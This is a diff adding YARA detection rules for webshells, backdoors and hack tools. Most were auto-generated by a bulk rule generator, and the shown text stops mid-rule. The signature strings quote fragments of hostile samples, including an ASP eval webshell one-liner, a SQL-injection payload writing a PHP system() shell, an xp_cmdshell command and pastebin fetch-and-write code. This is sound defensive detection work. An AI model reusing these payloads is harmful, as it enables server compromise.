+		$s6 = "0)0O0\\0a0o0\"1E1P1q1"
+		$s7 = "<.<I<d<h<l<p<t<x<|<"
+		$s8 = "3&31383>3F3Q3X3`3f3w3|3"
+		$s9 = "8@;D;H;L;P;T;X;\\;a;9=W=z="
+	condition:
+		all of them
+}
+rule webadmin {
+	meta:
+		description = "Webshells Auto-generated - file webadmin.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "3a90de401b30e5b590362ba2dde30937"
+	strings:
+		$s0 = "<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpu"
+	condition:
+		all of them
+}
+rule commands {
+	meta:
+		description = "Webshells Auto-generated - file commands.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "174486fe844cb388e2ae3494ac2d1ec2"
+	strings:
+		$s1 = "If CheckRecord(\"SELECT COUNT(ID) FROM VictimDetail WHERE VictimID = \" & VictimID"
+		$s2 = "proxyArr = Array (\"HTTP_X_FORWARDED_FOR\",\"HTTP_VIA\",\"HTTP_CACHE_CONTROL\",\"HTTP_F"
+	condition:
+		all of them
+}
+rule hkdoordll {
+	meta:
+		description = "Webshells Auto-generated - file hkdoordll.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b715c009d47686c0e62d0981efce2552"
+	strings:
+		$s6 = "Can't uninstall,maybe the backdoor is not installed or,the Password you INPUT is"
+	condition:
+		all of them
+}
+rule r57shell_2 {
+	meta:
+		description = "Webshells Auto-generated - file r57shell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "8023394542cddf8aee5dec6072ed02b5"
+	strings:
+		$s2 = "echo \"<br>\".ws(2).\"HDD Free : <b>\".view_size($free).\"</b> HDD Total : <b>\".view_"
+	condition:
+		all of them
+}
+rule Mithril_v1_45_dllTest {
+	meta:
+		description = "Webshells Auto-generated - file dllTest.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "1b9e518aaa62b15079ff6edb412b21e9"
+	strings:
+		$s3 = "syspath"
+		$s4 = "\\Mithril"
+		$s5 = "--list the services in the computer"
+	condition:
+		all of them
+}
+rule dbgiis6cli {
+	meta:
+		description = "Webshells Auto-generated - file dbgiis6cli.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "3044dceb632b636563f66fee3aaaf8f3"
+	strings:
+		$s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
+		$s5 = "###command:(NO more than 100 bytes!)"
+	condition:
+		all of them
+}
+rule remview_2003_04_22 {
+	meta:
+		description = "Webshells Auto-generated - file remview_2003_04_22.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "17d3e4e39fbca857344a7650f7ea55e3"
+	strings:
+		$s1 = "\"<b>\".mm(\"Eval PHP code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\""
+	condition:
+		all of them
+}
+rule FSO_s_test {
+	meta:
+		description = "Webshells Auto-generated - file test.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "82cf7b48da8286e644f575b039a99c26"
+	strings:
+		$s0 = "$yazi = \"test\" . \"\\r\\n\";"
+		$s2 = "fwrite ($fp, \"$yazi\");"
+	condition:
+		all of them
+}
+rule Debug_cress {
+	meta:
+		description = "Webshells Auto-generated - file cress.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "36a416186fe010574c9be68002a7286a"
+	strings:
+		$s0 = "\\Mithril "
+		$s4 = "Mithril.exe"
+	condition:
+		all of them
+}
+rule webshell {
+	meta:
+		description = "Webshells Auto-generated - file webshell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "f2f8c02921f29368234bfb4d4622ad19"
+	strings:
+		$s0 = "RhViRYOzz"
+		$s1 = "d\\O!jWW"
+		$s2 = "bc!jWW"
+		$s3 = "0W[&{l"
+		$s4 = "[INhQ@\\"
+	condition:
+		all of them
+}
+rule FSO_s_EFSO_2 {
+	meta:
+		description = "Webshells Auto-generated - file EFSO_2.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "a341270f9ebd01320a7490c12cb2e64c"
+	strings:
+		$s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV"
+		$s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j"
+	condition:
+		all of them
+}
+rule thelast_index3 {
+	meta:
+		description = "Webshells Auto-generated - file index3.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "cceff6dc247aaa25512bad22120a14b4"
+	strings:
+		$s5 = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"Your Name\\\" field is r"
+	condition:
+		all of them
+}
+rule adjustcr {
+	meta:
+		description = "Webshells Auto-generated - file adjustcr.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "17037fa684ef4c90a25ec5674dac2eb6"
+	strings:
+		$s0 = "$Info: This file is packed with the UPX executable packer $"
+		$s2 = "$License: NRV for UPX is distributed under special license $"
+		$s6 = "AdjustCR Carr"
+		$s7 = "ION\\System\\FloatingPo"
+	condition:
+		all of them
+}
+rule FeliksPack3___PHP_Shells_xIShell {
+	meta:
+		description = "Webshells Auto-generated - file xIShell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "997c8437c0621b4b753a546a53a88674"
+	strings:
+		$s3 = "if (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='Java"
+	condition:
+		all of them
+}
+rule HYTop_AppPack_2005 {
+	meta:
+		description = "Webshells Auto-generated - file 2005.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "63d9fd24fa4d22a41fc5522fc7050f9f"
+	strings:
+		$s6 = "\" onclick=\"this.form.sqlStr.value='e:\\hytop.mdb"
+	condition:
+		all of them
+}
+rule xssshell {
+	meta:
+		description = "Webshells Auto-generated - file xssshell.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "8fc0ffc5e5fbe85f7706ffc45b3f79b4"
+	strings:
+		$s1 = "if( !getRequest(COMMANDS_URL + \"?v=\" + VICTIM + \"&r=\" + generateID(), \"pushComma"
+	condition:
+		all of them
+}
+rule FeliksPack3___PHP_Shells_usr {
+	meta:
+		description = "Webshells Auto-generated - file usr.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "ade3357520325af50c9098dc8a21a024"
+	strings:
+		$s0 = "<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor"
+	condition:
+		all of them
+}
+rule FSO_s_phpinj {
+	meta:
+		description = "Webshells Auto-generated - file phpinj.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "dd39d17e9baca0363cc1c3664e608929"
+	strings:
+		$s4 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';"
+	condition:
+		all of them
+}
+rule xssshell_db {
+	meta:
+		description = "Webshells Auto-generated - file db.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "cb62e2ec40addd4b9930a9e270f5b318"
+	strings:
+		$s8 = "'// By Ferruh Mavituna | http://ferruh.mavituna.com"
+	condition:
+		all of them
+}
+rule PHP_sh {
+	meta:
+		description = "Webshells Auto-generated - file sh.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "1e9e879d49eb0634871e9b36f99fe528"
+	strings:
+		$s1 = "\"@$SERVER_NAME \".exec(\"pwd\")"
+	condition:
+		all of them
+}
+rule xssshell_default {
+	meta:
+		description = "Webshells Auto-generated - file default.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "d156782ae5e0b3724de3227b42fcaf2f"
+	strings:
+		$s3 = "If ProxyData <> \"\" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, \"<br />\")"
+	condition:
+		all of them
+}
+rule EditServer_2 {
+	meta:
+		description = "Webshells Auto-generated - file EditServer.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "5c1f25a4d206c83cdfb006b3eb4c09ba"
+	strings:
+		$s0 = "@HOTMAIL.COM"
+		$s1 = "Press Any Ke"
+		$s3 = "glish MenuZ"
+	condition:
+		all of them
+}
+rule by064cli {
+	meta:
+		description = "Webshells Auto-generated - file by064cli.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "10e0dff366968b770ae929505d2a9885"
+	strings:
+		$s7 = "packet dropped,redirecting"
+		$s9 = "input the password(the default one is 'by')"
+	condition:
+		all of them
+}
+rule Mithril_dllTest {
+	meta:
+		description = "Webshells Auto-generated - file dllTest.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "a8d25d794d8f08cd4de0c3d6bf389e6d"
+	strings:
+		$s0 = "please enter the password:"
+		$s3 = "\\dllTest.pdb"
+	condition:
+		all of them
+}
+rule peek_a_boo {
+	meta:
+		description = "Webshells Auto-generated - file peek-a-boo.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "aca339f60d41fdcba83773be5d646776"
+	strings:
+		$s0 = "__vbaHresultCheckObj"
+		$s1 = "\\VB\\VB5.OLB"
+		$s2 = "capGetDriverDescriptionA"
+		$s3 = "__vbaExceptHandler"
+		$s4 = "EVENT_SINK_Release"
+		$s8 = "__vbaErrorOverflow"
+	condition:
+		all of them
+}
+rule fmlibraryv3 {
+	meta:
+		description = "Webshells Auto-generated - file fmlibraryv3.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "c34c248fed6d5a20d8203924a2088acc"
+	strings:
+		$s3 = "ExeNewRs.CommandText = \"UPDATE \" & tablename & \" SET \" & ExeNewRsValues & \" WHER"
+	condition:
+		all of them
+}
+rule Debug_dllTest_2 {
+	meta:
+		description = "Webshells Auto-generated - file dllTest.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "1b9e518aaa62b15079ff6edb412b21e9"
+	strings:
+		$s4 = "\\Debug\\dllTest.pdb"
+		$s5 = "--list the services in the computer"
+	condition:
+		all of them
+}
+rule connector {
+	meta:
+		description = "Webshells Auto-generated - file connector.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "3ba1827fca7be37c8296cd60be9dc884"
+	strings:
+		$s2 = "If ( AttackID = BROADCAST_ATTACK )"
+		$s4 = "Add UNIQUE ID for victims / zombies"
+	condition:
+		all of them
+}
+rule shelltools_g0t_root_HideRun {
+	meta:
+		description = "Webshells Auto-generated - file HideRun.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "45436d9bfd8ff94b71eeaeb280025afe"
+	strings:
+		$s0 = "Usage -- hiderun [AppName]"
+		$s7 = "PVAX SW, Alexey A. Popoff, Moscow, 1997."
+	condition:
+		all of them
+}
+rule regshell {
+	meta:
+		description = "Webshells Auto-generated - file regshell.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "db2fdc821ca6091bab3ebd0d8bc46ded"
+	strings:
+		$s0 = "Changes the base hive to HKEY_CURRENT_USER."
+		$s4 = "Displays a list of values and sub-keys in a registry Hive."
+		$s5 = "Enter a menu selection number (1 - 3) or 99 to Exit: "
+	condition:
+		all of them
+}
+rule PHP_Shell_v1_7 {
+	meta:
+		description = "Webshells Auto-generated - file PHP_Shell_v1.7.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b5978501c7112584532b4ca6fb77cba5"
+	strings:
+		$s8 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]"
+	condition:
+		all of them
+}
+rule xssshell_save {
+	meta:
+		description = "Webshells Auto-generated - file save.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "865da1b3974e940936fe38e8e1964980"
+	strings:
+		$s4 = "RawCommand = Command & COMMAND_SEPERATOR & Param & COMMAND_SEPERATOR & AttackID"
+		$s5 = "VictimID = fm_NStr(Victims(i))"
+	condition:
+		all of them
+}
+rule screencap {
+	meta:
+		description = "Webshells Auto-generated - file screencap.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "51139091dea7a9418a50f2712ea72aa6"
+	strings:
+		$s0 = "GetDIBColorTable"
+		$s1 = "Screen.bmp"
+		$s2 = "CreateDCA"
+	condition:
+		all of them
+}
+rule FSO_s_phpinj_2 {
+	meta:
+		description = "Webshells Auto-generated - file phpinj.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "dd39d17e9baca0363cc1c3664e608929"
+	strings:
+		$s9 = "<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO"
+	condition:
+		all of them
+}
+rule ZXshell2_0_rar_Folder_zxrecv {
+	meta:
+		description = "Webshells Auto-generated - file zxrecv.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "5d3d12a39f41d51341ef4cb7ce69d30f"
+	strings:
+		$s0 = "RyFlushBuff"
+		$s1 = "teToWideChar^FiYP"
+		$s2 = "mdesc+8F D"
+		$s3 = "\\von76std"
+		$s4 = "5pur+virtul"
+		$s5 = "- Kablto io"
+		$s6 = "ac#f{lowi8a"
+	condition:
+		all of them
+}
+rule FSO_s_ajan {
+	meta:
+		description = "Webshells Auto-generated - file ajan.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "22194f8c44524f80254e1b5aec67b03e"
+	strings:
+		$s4 = "entrika.write \"BinaryStream.SaveToFile"
+	condition:
+		all of them
+}
+rule c99shell {
+	meta:
+		description = "Webshells Auto-generated - file c99shell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "90b86a9c63e2cd346fe07cea23fbfc56"
+	strings:
+		$s0 = "<br />Input&nbsp;URL:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&"
+	condition:
+		all of them
+}
+rule phpspy_2005_full {
+	meta:
+		description = "Webshells Auto-generated - file phpspy_2005_full.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "d1c69bb152645438440e6c903bac16b2"
+	strings:
+		$s7 = "echo \"  <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco"
+	condition:
+		all of them
+}
+rule FSO_s_zehir4_2 {
+	meta:
+		description = "Webshells Auto-generated - file zehir4.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "5b496a61363d304532bcf52ee21f5d55"
+	strings:
+		$s4 = "\"Program Files\\Serv-u\\Serv"
+	condition:
+		all of them
+}
+rule httpdoor {
+	meta:
+		description = "Webshells Auto-generated - file httpdoor.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "6097ea963455a09474471a9864593dc3"
+	strings:
+		$s4 = "''''''''''''''''''DaJKHPam"
+		$s5 = "o,WideCharR]!n]"
+		$s6 = "HAutoComplete"
+		$s7 = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch"
+	condition:
+		all of them
+}
+rule FSO_s_indexer_2 {
+	meta:
+		description = "Webshells Auto-generated - file indexer.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "135fc50f85228691b401848caef3be9e"
+	strings:
+		$s5 = "<td>Nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>"
+	condition:
+		all of them
+}
+rule HYTop_DevPack_2005 {
+	meta:
+		description = "Webshells Auto-generated - file 2005.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "63d9fd24fa4d22a41fc5522fc7050f9f"
+	strings:
+		$s7 = "theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\")"
+		$s8 = "scrollbar-darkshadow-color:#9C9CD3;"
+		$s9 = "scrollbar-face-color:#E4E4F3;"
+	condition:
+		all of them
+}
+rule _root_040_zip_Folder_deploy {
+	meta:
+		description = "Webshells Auto-generated - file deploy.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "2c9f9c58999256c73a5ebdb10a9be269"
+	strings:
+		$s5 = "halon synscan 127.0.0.1 1-65536"
+		$s8 = "Obviously you replace the ip address with that of the target."
+
+	condition:
+		all of them
+}
+rule by063cli {
+	meta:
+		description = "Webshells Auto-generated - file by063cli.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "49ce26eb97fd13b6d92a5e5d169db859"
+	strings:
+		$s2 = "#popmsghello,are you all right?"
+		$s4 = "connect failed,check your network and remote ip."
+	condition:
+		all of them
+}
+rule icyfox007v1_10_rar_Folder_asp {
+	meta:
+		description = "Webshells Auto-generated - file asp.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "2c412400b146b7b98d6e7755f7159bb9"
+	strings:
+		$s0 = "<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>"
+	condition:
+		all of them
+}
+rule FSO_s_EFSO_2_2 {
+	meta:
+		description = "Webshells Auto-generated - file EFSO_2.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "a341270f9ebd01320a7490c12cb2e64c"
+	strings:
+		$s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV"
+		$s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j"
+	condition:
+		all of them
+}
+rule byshell063_ntboot_2 {
+	meta:
+		description = "Webshells Auto-generated - file ntboot.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "cb9eb5a6ff327f4d6c46aacbbe9dda9d"
+	strings:
+		$s6 = "OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)"
+	condition:
+		all of them
+}
+rule u_uay {
+	meta:
+		description = "Webshells Auto-generated - file uay.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "abbc7b31a24475e4c5d82fc4c2b8c7c4"
+	strings:
+		$s1 = "exec \"c:\\WINDOWS\\System32\\freecell.exe"
+		$s9 = "SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Security"
+	condition:
+		1 of them
+}
+rule bin_wuaus {
+	meta:
+		description = "Webshells Auto-generated - file wuaus.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "46a365992bec7377b48a2263c49e4e7d"
+	strings:
+		$s1 = "9(90989@9V9^9f9n9v9"
+		$s2 = ":(:,:0:4:8:C:H:N:T:Y:_:e:o:y:"
+		$s3 = ";(=@=G=O=T=X=\\="
+		$s4 = "TCP Send Error!!"
+		$s5 = "1\"1;1X1^1e1m1w1~1"
+		$s8 = "=$=)=/=<=Y=_=j=p=z="
+	condition:
+		all of them
+}
+rule pwreveal {
+	meta:
+		description = "Webshells Auto-generated - file pwreveal.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b4e8447826a45b76ca45ba151a97ad50"
+	strings:
+		$s0 = "*<Blank - no es"
+		$s3 = "JDiamondCS "
+		$s8 = "sword set> [Leith=0 bytes]"
+		$s9 = "ION\\System\\Floating-"
+	condition:
+		all of them
+}
+rule shelltools_g0t_root_xwhois {
+	meta:
+		description = "Webshells Auto-generated - file xwhois.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "0bc98bd576c80d921a3460f8be8816b4"
+	strings:
+		$s1 = "rting! "
+		$s2 = "aTypCog("
+		$s5 = "Diamond"
+		$s6 = "r)r=rQreryr"
+	condition:
+		all of them
+}
+rule vanquish_2 {
+	meta:
+		description = "Webshells Auto-generated - file vanquish.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "2dcb9055785a2ee01567f52b5a62b071"
+	strings:
+		$s2 = "Vanquish - DLL injection failed:"
+	condition:
+		all of them
+}
+rule down_rar_Folder_down {
+	meta:
+		description = "Webshells Auto-generated - file down.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "db47d7a12b3584a2e340567178886e71"
+	strings:
+		$s0 = "response.write \"<font color=blue size=2>NetBios Name: \\\\\"  & Snet.ComputerName &"
+	condition:
+		all of them
+}
+rule cmdShell {
+	meta:
+		description = "Webshells Auto-generated - file cmdShell.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "8a9fef43209b5d2d4b81dfbb45182036"
+	strings:
+		$s1 = "if cmdPath=\"wscriptShell\" then"
+	condition:
+		all of them
+}
+rule ZXshell2_0_rar_Folder_nc {
+	meta:
+		description = "Webshells Auto-generated - file nc.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "2cd1bf15ae84c5f6917ddb128827ae8b"
+	strings:
+		$s0 = "WSOCK32.dll"
+		$s1 = "?bSUNKNOWNV"
+		$s7 = "p@gram Jm6h)"
+		$s8 = "ser32.dllCONFP@"
+	condition:
+		all of them
+}
+rule portlessinst {
+	meta:
+		description = "Webshells Auto-generated - file portlessinst.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "74213856fc61475443a91cd84e2a6c2f"
+	strings:
+		$s2 = "Fail To Open Registry"
+		$s3 = "f<-WLEggDr\""
+		$s6 = "oMemoryCreateP"
+	condition:
+		all of them
+}
+rule SetupBDoor {
+	meta:
+		description = "Webshells Auto-generated - file SetupBDoor.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "41f89e20398368e742eda4a3b45716b6"
+	strings:
+		$s1 = "\\BDoor\\SetupBDoor"
+	condition:
+		all of them
+}
+rule phpshell_3 {
+	meta:
+		description = "Webshells Auto-generated - file phpshell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "e8693a2d4a2ffea4df03bb678df3dc6d"
+	strings:
+		$s3 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>"
+		$s5 = "      echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";"
+	condition:
+		all of them
+}
+rule BIN_Server {
+	meta:
+		description = "Webshells Auto-generated - file Server.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "1d5aa9cbf1429bb5b8bf600335916dcd"
+	strings:
+		$s0 = "configserver"
+		$s1 = "GetLogicalDrives"
+		$s2 = "WinExec"
+		$s4 = "fxftest"
+		$s5 = "upfileok"
+		$s7 = "upfileer"
+	condition:
+		all of them
+}
+rule HYTop2006_rar_Folder_2006 {
+	meta:
+		description = "Webshells Auto-generated - file 2006.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "c19d6f4e069188f19b08fa94d44bc283"
+	strings:
+		$s6 = "strBackDoor = strBackDoor "
+	condition:
+		all of them
+}
+rule r57shell_3 {
+	meta:
+		description = "Webshells Auto-generated - file r57shell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "87995a49f275b6b75abe2521e03ac2c0"
+	strings:
+		$s1 = "<b>\".$_POST['cmd']"
+	condition:
+		all of them
+}
+
+
+rule HDConfig {
+	meta:
+		description = "Webshells Auto-generated - file HDConfig.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "7d60e552fdca57642fd30462416347bd"
+	strings:
+		$s0 = "An encryption key is derived from the password hash. "
+		$s3 = "A hash object has been created. "
+		$s4 = "Error during CryptCreateHash!"
+		$s5 = "A new key container has been created."
+		$s6 = "The password has been added to the hash. "
+	condition:
+		all of them
+}
+rule FSO_s_ajan_2 {
+	meta:
+		description = "Webshells Auto-generated - file ajan.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "22194f8c44524f80254e1b5aec67b03e"
+	strings:
+		$s2 = "\"Set WshShell = CreateObject(\"\"WScript.Shell\"\")"
+		$s3 = "/file.zip"
+	condition:
+		all of them
+}
+
+rule Webshell_and_Exploit_CN_APT_HK : Webshell
+{
+meta:
+	author = "Florian Roth"
+	description = "Webshell and Exploit Code in relation with APT against Honk Kong protesters"
+	date = "10.10.2014"
+	score = 50
+strings:
+	$a0 = "<script language=javascript src=http://java-se.com/o.js</script>" fullword
+	$s0 = "<span style=\"font:11px Verdana;\">Password: </span><input name=\"password\" type=\"password\" size=\"20\">"
+	$s1 = "<input type=\"hidden\" name=\"doing\" value=\"login\">"
+condition:
+	$a0 or ( all of ($s*) )
+}
+
+rule JSP_Browser_APT_webshell {
+	meta: 
+		description = "VonLoesch JSP Browser used as web shell by APT groups - jsp File browser 1.1a"
+		author = "F.Roth"
+		date = "10.10.2014"
+		score = 60
+	strings:
+		$a1a = "private static final String[] COMMAND_INTERPRETER = {\"" ascii
+		$a1b = "cmd\", \"/C\"}; // Dos,Windows" ascii
+		$a2 = "Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));" ascii
+		$a3 = "ret.append(\"!!!! Process has timed out, destroyed !!!!!\");" ascii
+	condition:
+		all of them
+}
+
+rule JSP_jfigueiredo_APT_webshell {
+	meta: 
+		description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
+		author = "F.Roth"
+		date = "12.10.2014"
+		score = 60
+		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/Browser.jsp"
+	strings:
+		$a1 = "String fhidden = new String(Base64.encodeBase64(path.getBytes()));" ascii
+		$a2 = "<form id=\"upload\" name=\"upload\" action=\"ServFMUpload\" method=\"POST\" enctype=\"multipart/form-data\">" ascii
+	condition:
+		all of them
+}
+
+rule JSP_jfigueiredo_APT_webshell_2 {
+	meta: 
+		description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
+		author = "F.Roth"
+		date = "12.10.2014"
+		score = 60
+		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/"
+	strings:
+		$a1 = "<div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>" ascii
+		$a2 = "$(\"#dialog\").dialog(\"destroy\");" ascii
+		$s1 = "<form id=\"form\" action=\"ServFMUpload\" method=\"post\" enctype=\"multipart/form-data\">" ascii
+		$s2 = "<input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"L3BkZi8=\" />" ascii
+	condition:
+		all of ($a*) or all of ($s*)
+}
+
+rule AJAX_FileUpload_webshell {
+	meta: 
+		description = "AJAX JS/CSS components providing web shell by APT groups"
+		author = "F.Roth"
+		date = "12.10.2014"
+		score = 75
+		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/ajaxfileupload.js"
+	strings:
+		$a1 = "var frameId = 'jUploadFrame' + id;" ascii
+		$a2 = "var form = jQuery('<form  action=\"\" method=\"POST\" name=\"' + formId + '\" id=\"' + formId + '\" enctype=\"multipart/form-data\"></form>');" ascii
+		$a3 = "jQuery(\"<div>\").html(data).evalScripts();" ascii
+	condition:
+		all of them
+}
+
+rule Webshell_Insomnia {
+	meta:
+		description = "Insomnia Webshell - file InsomniaShell.aspx"
+		author = "Florian Roth"
+		reference = "http://www.darknet.org.uk/2014/12/insomniashell-asp-net-reverse-shell-bind-shell/"
+		date = "2014/12/09"
+		hash = "e0cfb2ffaa1491aeaf7d3b4ee840f72d42919d22"
+		score = 80
+	strings:
+		$s0 = "Response.Write(\"- Failed to create named pipe:\");" fullword ascii
+		$s1 = "Response.Output.Write(\"+ Sending {0}<br>\", command);" fullword ascii
+		$s2 = "String command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1" ascii
+		$s3 = "Response.Write(\"- Error Getting User Info<br>\");" fullword ascii
+		$s4 = "string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes," fullword ascii
+		$s5 = "[DllImport(\"Advapi32.dll\", SetLastError = true)]" fullword ascii
+		$s9 = "username = DumpAccountSid(tokUser.User.Sid);" fullword ascii
+		$s14 = "//Response.Output.Write(\"Opened process PID: {0} : {1}<br>\", p" ascii
+	condition:
+		3 of them
+}
+
+rule HawkEye_PHP_Panel {
+	meta:
+		description = "Detects HawkEye Keyloggers PHP Panel"
+		author = "Florian Roth"
+		date = "2014/12/14"
+		score = 60
+	strings:
+		$s0 = "$fname = $_GET['fname'];" ascii fullword
+		$s1 = "$data = $_GET['data'];" ascii fullword
+		$s2 = "unlink($fname);" ascii fullword
+		$s3 = "echo \"Success\";" fullword ascii
+	condition:
+		all of ($s*) and filesize < 600
+}
+
+rule SoakSoak_Infected_Wordpress {
+	meta:
+		description = "Detects a SoakSoak infected Wordpress site http://goo.gl/1GzWUX"
+		reference = "http://goo.gl/1GzWUX"
+		author = "Florian Roth"
+		date = "2014/12/15"
+		score = 60
+	strings:
+		$s0 = "wp_enqueue_script(\"swfobject\");" ascii fullword
+		$s1 = "function FuncQueueObject()" ascii fullword
+		$s2 = "add_action(\"wp_enqueue_scripts\", 'FuncQueueObject');" ascii fullword
+	condition:
+		all of ($s*)
+}
+
+
+rule Pastebin_Webshell {
+	meta:
+		description = "Detects a web shell that downloads content from pastebin.com http://goo.gl/7dbyZs"
+		author = "Florian Roth"
+		score = 70
+		date = "13.01.2015"
+		reference = "http://goo.gl/7dbyZs"
+	strings:
+		$s0 = "file_get_contents(\"http://pastebin.com" ascii
+		$s1 = "xcurl('http://pastebin.com/download.php" ascii
+		$s2 = "xcurl('http://pastebin.com/raw.php" ascii
+		
+		$x0 = "if($content){unlink('evex.php');" ascii
+		$x1 = "$fh2 = fopen(\"evex.php\", 'a');" ascii
+		
+		$y0 = "file_put_contents($pth" ascii
+		$y1 = "echo \"<login_ok>" ascii
+		$y2 = "str_replace('* @package Wordpress',$temp" ascii
+	condition:
